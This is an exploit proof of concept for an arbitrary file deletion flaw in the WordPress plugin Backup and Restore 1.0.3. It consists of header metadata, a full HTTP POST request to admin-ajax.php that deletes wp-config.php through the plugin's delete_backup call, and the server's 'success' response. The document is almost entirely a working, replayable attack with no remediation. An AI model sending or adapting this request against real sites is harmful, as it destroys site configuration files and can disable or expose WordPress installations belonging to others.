# Exploit Title: WordPress Plugin Backup and Restore 1.0.3 - Arbitrary File Deletion # Date: 11/07/2021 # Exploit Author: Murat DEMIRCI (@butterflyhunt3r) # Vendor Homepage: https://www.miniorange.com/ # Software Link: https://wordpress.org/plugins/backup-and-restore-for-wp/ # Version: 1.0.3 # Tested on : Windows 10 #Poc: ----------------------------------REQUEST--------------------------------------- POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/wordpress/wp-admin/admin.php?page=mo_eb_backup_report Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 155 Origin: http://localhost Connection: close Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1636463166%7C9VH5dtz6rmSefsnxLUWgFNF85FReGRWg61Nhbu95sJZ%7E82178aa467cd00f9cbcce03c6157fdcbf581a715d3cdc7a6b5c940dafe58fifd; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9371ce3ee91=admin%7C1836463166%7C9VH5dtz6rmSefsnxLUZgFNF85FReGRWg61Vhau95sJZ%7C9ae26395803f7d17f75c62d98856f3249e72688d38a9d3dbb616a0e3c808c917; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do%26posts_list_mode%3Dlist; wp-settings-time-1=1636290368 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin action=barfw_backup_ajax_redirect&call_type=delete_backup&file_name=wp-config.php&folder_name=C%3a%5cxampp%5chtdocs%5cwordpress%5c%5c&id=5&nonce=ee90968cce ---------------------------------------------------------------------------------- -------------------------------RESPONSE------------------------------------------- HTTP/1.1 200 OK Date: Sun, 07 Nov 2021 13:19:38 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7 X-Powered-By: PHP/8.0.7 Access-Control-Allow-Origin: http://localhost Access-Control-Allow-Credentials: true X-Robots-Tag: noindex X-Content-Type-Options: nosniff Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Referrer-Policy: strict-origin-when-cross-origin Content-Length: 9 Connection: close Content-Type: application/json; charset=UTF-8 "success" ----------------------------------------------------------------------------------